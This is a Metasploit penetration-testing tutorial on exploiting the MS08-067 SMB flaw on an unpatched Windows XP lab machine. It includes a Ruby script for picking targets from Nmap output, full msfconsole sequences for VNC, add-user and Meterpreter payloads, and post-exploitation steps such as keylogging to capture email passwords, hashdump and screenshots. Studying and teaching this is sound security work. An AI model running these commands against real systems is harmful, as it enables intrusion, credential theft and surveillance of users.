METASPLOIT

The Metasploit Framework (MSF) is a free, open source penetration testing framework developed by the open source community and Rapid7. It covers information gathering and vulnerability scanning as well as exploitation and post-exploitation. Because it ships with a library of ready-made exploit modules and payloads, Metasploit removes the need to write an individual exploit for each target, saving considerable time and effort.
Terminology used in Metasploit:
• Vulnerability
• Exploit
• Payload
Vulnerability:
A weakness in the target system (a bug or a misconfiguration) through which an attacker can gain access.
Exploit:
Once a vulnerability is known, an attacker takes advantage of it and breaks into the system using code or a script known as an exploit. In Metasploit, exploits are modules, such as exploit/windows/smb/ms08_067_netapi.
Payload:
The code that the exploit delivers and runs on the compromised system once the vulnerability has been triggered, for example a command shell, a VNC server, a new user account or a Meterpreter session. The payload is what gives the attacker control of, and continued access to, the target.
NMAP:
Nmap (Network Mapper) can be used to perform port and service scans and information gathering, and it can be run from within the Metasploit console. Nmap's discovery capabilities go beyond simply determining whether a host is up or down and which ports are open or closed: with OS detection (-O) and version detection (-sV) it also guesses the operating system and the version of each listening service.
Metasploit Console:
The command below scans the target system and performs OS detection. msfconsole passes commands it does not recognise to the operating system shell, so nmap runs as it would from a normal prompt; db_nmap runs the same scan and also stores the results in the Metasploit database.
msf > nmap 192.168.x.x -O
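Scan output has to be turned into a target list before the exploitation steps below can be applied. The following Ruby script is an added example, not code from the original page or from Metasploit: it parses Nmap greppable output (nmap -O -oG) and selects the hosts worth handing to the ms08_067_netapi module used in the attacks below, that is, hosts with 445/tcp open and an OS guess of Windows. The scan lines and addresses are constructed to mimic -oG output; they are not a real capture.

```ruby
# Added example, not from the original page or from Metasploit: triage Nmap
# greppable output (nmap -O -p 139,445 -oG scan.gnmap <range>) and pick the
# hosts worth handing to exploit/windows/smb/ms08_067_netapi: 445/tcp open and
# an OS guess that says Windows. The scan lines below are constructed to mimic
# -oG output; the addresses are made up.

SAMPLE_GNMAP = [
  "# Nmap 5.21 scan initiated as: nmap -O -p 139,445 -oG scan.gnmap 192.168.1.0/24",
  "Host: 192.168.1.5 ()\tStatus: Up",
  "Host: 192.168.1.5 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///" \
    "\tIgnored State: closed (998)\tOS: Microsoft Windows XP SP2 or SP3\tSeq Index: 258\tIP ID Seq: Incremental",
  "Host: 192.168.1.10 ()\tStatus: Up",
  "Host: 192.168.1.10 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///" \
    "\tIgnored State: closed (998)\tOS: Linux 2.6.18 - 2.6.32\tSeq Index: 3038\tIP ID Seq: All zeros",
  "Host: 192.168.1.20 ()\tStatus: Up",
  "Host: 192.168.1.20 ()\tPorts: 139/closed/tcp//netbios-ssn///, 445/filtered/tcp//microsoft-ds///" \
    "\tIgnored State: closed (998)\tOS: Microsoft Windows 7\tSeq Index: 260\tIP ID Seq: Incremental",
  "Host: 192.168.1.30 ()\tStatus: Up",
  "Host: 192.168.1.30 ()\tPorts: 445/open/tcp//microsoft-ds///\tIgnored State: closed (999)",
  "# Nmap done: 256 IP addresses (4 hosts up) scanned"
].join("\n")

Target = Struct.new(:ip, :os, :open_tcp)

# Parse -oG text into one Target per host. Fields on a "Host:" line are
# tab-separated ("Ports:", "OS:", ...); each entry inside "Ports:" is
# port/state/protocol/owner/service/rpcinfo/version separated by "/".
def parse_gnmap(text)
  hosts = {}
  text.each_line do |line|
    next unless line.start_with?("Host:")
    fields = line.chomp.split("\t")
    ip = fields.first[/\AHost:\s+(\S+)/, 1]
    target = (hosts[ip] ||= Target.new(ip, nil, []))
    fields.each do |field|
      case field
      when /\APorts:\s+(.*)\z/
        ports = Regexp.last_match(1)
        ports.split(/,\s*/).each do |entry|
          port, state, proto = entry.split("/")
          target.open_tcp << port.to_i if state == "open" && proto == "tcp"
        end
      when /\AOS:\s+(.*)\z/
        target.os = Regexp.last_match(1)
      end
    end
  end
  hosts.values
end

# Hosts that answer on SMB and look like Windows are candidates. A host with SMB
# open but no OS guess is reported separately: -O often fails through a
# firewall, and such a host still deserves a manual "check" in msfconsole.
def triage(targets)
  smb = targets.select { |t| t.open_tcp.include?(445) }
  {
    candidates: smb.select { |t| t.os.to_s.include?("Windows") },
    unknown_os: smb.select { |t| t.os.nil? }
  }
end

if __FILE__ == $PROGRAM_NAME
  result = triage(parse_gnmap(SAMPLE_GNMAP))
  result[:candidates].each { |t| puts "candidate:           #{t.ip} (#{t.os})" }
  result[:unknown_os].each { |t| puts "SMB open, OS unknown: #{t.ip}" }
end
```

On the constructed sample only 192.168.1.5 is a candidate: 192.168.1.10 is a Linux host (Samba), 192.168.1.20 has 445 filtered, and 192.168.1.30 has SMB open but no OS guess, so it is listed for a manual check rather than dropped. Greppable output was chosen over XML to keep the parser dependency-free; inside msfconsole, db_nmap stores the same information in the database.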
Here we use an SMB vulnerability. SMB (Server Message Block) is the protocol Windows uses to provide shared access to files, printers and serial ports between computers on a network. The vulnerability used below lies in the Windows Server service, the component that handles incoming SMB requests, and it allows remote code execution (Microsoft bulletin MS08-067, which the ms08_067_netapi module exploits). "Arbitrary code execution" means the attacker can run any command of their choosing on the target. The attacker may trigger code already on the box, invoking a program or DLL by exploiting the vulnerability, or may use the vulnerability to load their own code onto the box and then run it. In practice these two operations amount to the same thing: either way, the attacker wins.
First Attack:
The next step is to move from scanning to actual exploitation with Metasploit. Let us attempt to exploit a Windows XP system with the SMB vulnerability above from an attacker system running Metasploit. The lab setup consists of a Windows XP attacker system with the Metasploit Framework installed and a vulnerable, unpatched Windows XP system, both running as VMware virtual machines.
The “info” command provides detailed information about a particular module, including a description, all of its options and the available targets.
msf > info exploit/windows/smb/ms08_067_netapi
The “use” command selects a particular module; the prompt changes to show the active module.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
The “set” command configures framework options and parameters for the module you are currently working with. Here we select a Windows payload: VNC injection with a bind TCP listener, which opens a port on the target that we then connect to with a VNC viewer.
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp
The “show options” command displays which settings are available or required for the current module and for the selected payload.
msf exploit(ms08_067_netapi) > show options
Here we set the target IP address (RHOST).
msf exploit(ms08_067_netapi) > set rhost 192.168.x.x
The “check” command tests whether a target is vulnerable to a particular exploit without actually exploiting it. Not all modules support check; ms08_067_netapi does.
msf exploit(ms08_067_netapi) > check
Finally, the “exploit” command launches the exploit against the target system.
msf exploit(ms08_067_netapi) > exploit
Steps to be followed to attack the target system:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.x.x
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > check
msf exploit(ms08_067_netapi) > exploit
If the exploit succeeds, the VNC payload starts and we can view and control the desktop of the target system in a VNC viewer. The exploited Server service runs as SYSTEM, so the session has full control of the machine: files on the target can be read, modified or deleted.
Second Attack:
Here we add an extra user account to the target system with the windows/adduser payload. Note that exploiting MS08-067 is not always clean: if the wrong target (OS version, service pack or language) is selected, or the exploit is run repeatedly, the Server service or the whole target system can crash. Review the target list with “show targets” and let “check” confirm the host is vulnerable before running “exploit”.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/adduser
msf exploit(ms08_067_netapi) > set rhost 192.168.x.x
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > check
msf exploit(ms08_067_netapi) > exploit
Meterpreter
Meterpreter is a payload packaged with the Metasploit Framework. It was developed within Metasploit to make post-exploitation faster and easier: it is an advanced, multi-function payload that lets us extend our capabilities dynamically at run time while we are on a remote system where none of our usual tools are available.
The features of Meterpreter are:
1. It does not create any files on the hard disk; it resides in memory and injects itself into a running process.
2. Client-server communication between the attacker machine and the victim machine is encrypted.
3. It provides a platform for writing extensions, which are loaded into the session on demand.
Features of Meterpreter
With ordinary payloads we are offered a shell through which we can interact with the system in a limited way. Under these circumstances, once the system is exploited a single payload is delivered that does one thing, such as adding a user, hiding something or opening a shell, and then it is done. What if you want to download a file? Grab the password hashes of all user accounts? Pivot into another network? Escalate your privileges? These tasks can be done with plain payloads, but imagine the number of steps and the difficulties you would have to overcome along the way. Meterpreter provides all of this from a single session.
Meterpreter commands are grouped by the extension that provides them: the core commands are always present, the stdapi extension supplies the file system, networking, system, user interface and webcam commands, and the priv extension supplies the privilege escalation, password database and timestomp commands. The nine groups are listed below.
1) Core Commands
Command                    Description
-------                    -----------
?                          Help menu
background                 Backgrounds the current session
bgkill                     Kills a background meterpreter script
bglist                     Lists running background scripts
bgrun                      Executes a meterpreter script as a background thread
channel                    Displays information about active channels
close                      Closes a channel
detach                     Detach the meterpreter session (for http/https)
disable_unicode_encoding   Disables encoding of unicode strings
enable_unicode_encoding    Enables encoding of unicode strings
exit                       Terminate the meterpreter session
help                       Help menu
info                       Displays information about a Post module
interact                   Interacts with a channel
irb                        Drop into irb scripting mode
load                       Load one or more meterpreter extensions
migrate                    Migrate the server to another process
quit                       Terminate the meterpreter session
read                       Reads data from a channel
resource                   Run the commands stored in a file
run                        Executes a meterpreter script or Post module
use                        Deprecated alias for 'load'
write                      Writes data to a channel
2) Stdapi: File system Commands
Command        Description
-------        -----------
cat            Read the contents of a file to the screen
cd             Change directory
del            Delete the specified file
download       Download a file or directory
edit           Edit a file
getlwd         Print local working directory
getwd          Print working directory
lcd            Change local working directory
lpwd           Print local working directory
ls             List files
mkdir          Make directory
pwd            Print working directory
rm             Delete the specified file
rmdir          Remove directory
search         Search for files
upload         Upload a file or directory
3) Stdapi: Networking Commands
Command        Description
-------        -----------
ipconfig       Display interfaces
portfwd        Forward a local port to a remote service
route          View and modify the routing table
4) Stdapi: System Commands
Command        Description
-------        -----------
clearev        Clear the event log
drop_token     Relinquishes any active impersonation token
execute        Execute a command
getpid         Get the current process identifier
getprivs       Attempt to enable all privileges available to the current process
getuid         Get the user that the server is running as
kill           Terminate a process
ps             List running processes
reboot         Reboots the remote computer
reg            Modify and interact with the remote registry
rev2self       Calls RevertToSelf() on the remote machine
shell          Drop into a system command shell
shutdown       Shuts down the remote computer
steal_token    Attempts to steal an impersonation token from the target process
sysinfo        Gets information about the remote system, such as OS
5) Stdapi: User interface Commands
Command        Description
-------        -----------
enumdesktops   List all accessible desktops and window stations
getdesktop     Get the current meterpreter desktop
idletime       Returns the number of seconds the remote user has been idle
keyscan_dump   Dump the keystroke buffer
keyscan_start  Start capturing keystrokes
keyscan_stop   Stop capturing keystrokes
screenshot     Grab a screenshot of the interactive desktop
setdesktop     Change the meterpreter's current desktop
uictl          Control some of the user interface components
6) Stdapi: Webcam Commands
Command        Description
-------        -----------
record_mic     Record audio from the default microphone for X seconds
webcam_list    List webcams
webcam_snap    Take a snapshot from the specified webcam
7) Priv: Elevate Commands
Command        Description
-------        -----------
getsystem      Attempt to elevate your privilege to that of local system
8) Priv: Password database Commands
Command        Description
-------        -----------
hashdump       Dumps the contents of the SAM database
9) Priv: Timestomp Commands
Command        Description
-------        -----------
timestomp      Manipulate file MACE attributes
Getting a Meterpreter session
Select the exploit first, then set the payload and the addresses. Because windows/meterpreter/bind_tcp listens on the target, only RHOST is required; LHOST is harmless here but becomes mandatory with a reverse payload such as windows/meterpreter/reverse_tcp, where it must be the attacker's own address so the target knows where to connect back.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.x.x
msf exploit(ms08_067_netapi) > set lhost 192.168.x.x
msf exploit(ms08_067_netapi) > exploit
Third Attack:
Capturing a screenshot
The screenshot command of the Meterpreter stdapi extension exports an image of what the user is currently doing on their desktop to our machine. The desktop can reveal a lot about the remote machine, for example which antivirus product is running, which applications are open and what the user is working on.
meterpreter > screenshot
The screenshot is saved as an image file on the attacker's machine and Meterpreter prints its path.
Fourth Attack:
Capturing keystrokes (keylogging)
With the keylogrecorder script we can capture what the user types on the remote machine. By default the script migrates into the user's explorer.exe so that keystrokes from the interactive desktop session are captured, including what the user types into a web browser; this way we can grab, for example, the username and password of an email account.
meterpreter > run keylogrecorder
The captured keystrokes are written to a log file on the attacker's machine, for example:
C:\Documents and Settings\Administrator\.msf4\logs\scripts\keylogrecorder\notepad.txt
Many other actions are possible from the same session, for example:
meterpreter > run vnc
meterpreter > getsystem
meterpreter > reboot
meterpreter > shutdown
run vnc starts a VNC session to the target's desktop; getsystem attempts to elevate to LocalSystem (the MS08-067 session already runs as SYSTEM, so this matters mainly for sessions obtained as a lower-privileged user); reboot and shutdown are destructive and end the session, so use them only where the engagement rules allow it.